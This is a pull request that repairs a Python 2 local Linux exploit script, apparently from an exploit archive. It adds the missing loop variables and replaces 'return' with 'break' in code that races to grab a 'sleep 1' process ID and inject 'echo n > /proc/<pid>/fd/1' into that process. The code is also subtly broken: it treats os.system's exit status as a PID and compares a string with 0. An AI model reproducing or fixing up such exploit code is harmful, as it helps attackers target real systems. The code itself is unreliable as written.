### PR TITLE
Update 9844.py: undefined variables and wrong exit

### DIFF
--- a/platforms/linux/local/9844.py
+++ b/platforms/linux/local/9844.py
@@ -6,7 +6,11 @@
 import os
 import time
 import random
+
 #infinite loop
+i = 0
+x = 0
+
 while (i == 0):
         os.system("sleep 1")
         while (x == 0):
@@ -14,7 +18,7 @@ while (i == 0):
                 pid = str(os.system("ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }"))
                 if (pid == 0): #need an active pid, race condition applies
                         print "[+] Didnt grab PID, got: " + pid + " -- Retrying..."
-                        return
+                        break
                 else:
                         print "[+] PID: " + pid
                         loc = "echo n > /proc/" + pid + "/fd/1"


### PR DESCRIPTION
Both while loops fail because variables i and x are undefined and have no value. Also, in order to jump out of a while-loop one should use "break", as "return" is used to exit functions.